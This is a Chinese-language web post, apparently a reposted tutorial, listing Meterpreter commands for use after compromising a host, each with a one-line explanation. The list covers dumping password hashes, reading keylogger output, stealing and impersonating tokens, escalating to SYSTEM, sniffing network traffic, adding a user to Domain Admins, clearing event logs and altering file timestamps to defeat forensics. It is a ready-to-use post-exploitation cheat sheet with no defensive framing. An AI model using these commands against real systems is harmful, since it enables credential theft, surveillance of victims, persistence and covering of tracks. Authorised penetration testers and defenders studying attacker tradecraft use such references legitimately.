[后渗透]获取到 Meterpreter 之后的操作

[后渗透]获取到 Meterpreter 之后的操作

本文章向大家介绍[后渗透]获取到 Meterpreter 之后的操作,主要包括[后渗透]获取到 Meterpreter 之后的操作使用实例、应用技巧、基本知识点总结和需要注意事项,具有一定的参考价值,需要的朋友可以参考一下。
sysinfo
列出受控主机的系统信息

ls
列出目标主机的文件和文件夹信息

use priv
加载特权提升扩展模块,来扩展meterpreter库

ps
显示所有运行进程以及关联的用户账户

getsystem
通过各种攻击向量来提升到系统用户权限

shell
以所有可用令牌来运行一个交互的shell

screenshot
对目标主机的屏幕进行截图

upload file
向目标主机上传文件

download file
从目标主机下载文件

keyscan_dump
存储目标主机上或许的键盘记录

getprivs
尽可能多的获取目标主机上的特权

background
将你当前的meterpreter shell转为后台执行

hashdump
导出目标主机中的口令哈希值
help
打开帮助

run scriptname
运行meterpreter脚本,在scripts/meterpreter目录下可查看到所有脚本名

migrate PID
迁移到一个指定的进程ID

use incognito
加载inconito功能(用来盗取目标主机的令牌或是假冒用户)

list_tokens -u
列出目标主机用户组的可用令牌

impersonate_token DOMAIN_NAME\USERNAME
假冒目标主机上的可用令牌。

steal_token
盗窃给定进程的可用令牌并进行令牌假冒

drop_token
停止假冒当前的令牌
execute -f cmd.exe -i
执行cmd.exe命令并进行交互。

execute -f cmd.exe -i -t
以所有可用令牌来执行cmd命令。

execute -f cmd.exe -i -H -t
以所有可用令牌来执行cmd命令并隐藏该进程。
rev2self
回到控制目标主机的初始用户账户下。

reg command
在目标主机注册表中进行交互,创建,删除和查询等操作。

setdesktop number
切换到另一个用户界面(该功能基于那些用户已登录)。

uietl enable keyboard/mouse
接管目标主机的键盘和鼠标。
use sniffer
加载嗅探模块

sniffer_interfaces
列出目标主机所有开放的网络接口

sniffer_dump interfaceID pcapname
在目标主机上启动嗅探

sniffer_start interfaceID packet_buffer
在目标主机上针对特定范围的数据包缓冲区启动嗅探

sniffer_stats interfaceID
获取正在实施嗅探网络接口的统计数据

sniffer_stop interfaceID
停止嗅探
add_user username password -h ip
在远程目标主机上添加一个用户

add_group_user “Domain Adimins”username -h ip
将用户添加到目标主机的域管理员组中

clearev
清除目标主机上的日志记录

timestomp
修改文件属性,例如修改文件的创建时间(反取证调差)

reboot
重启目标主机

你可能感兴趣的:(hack)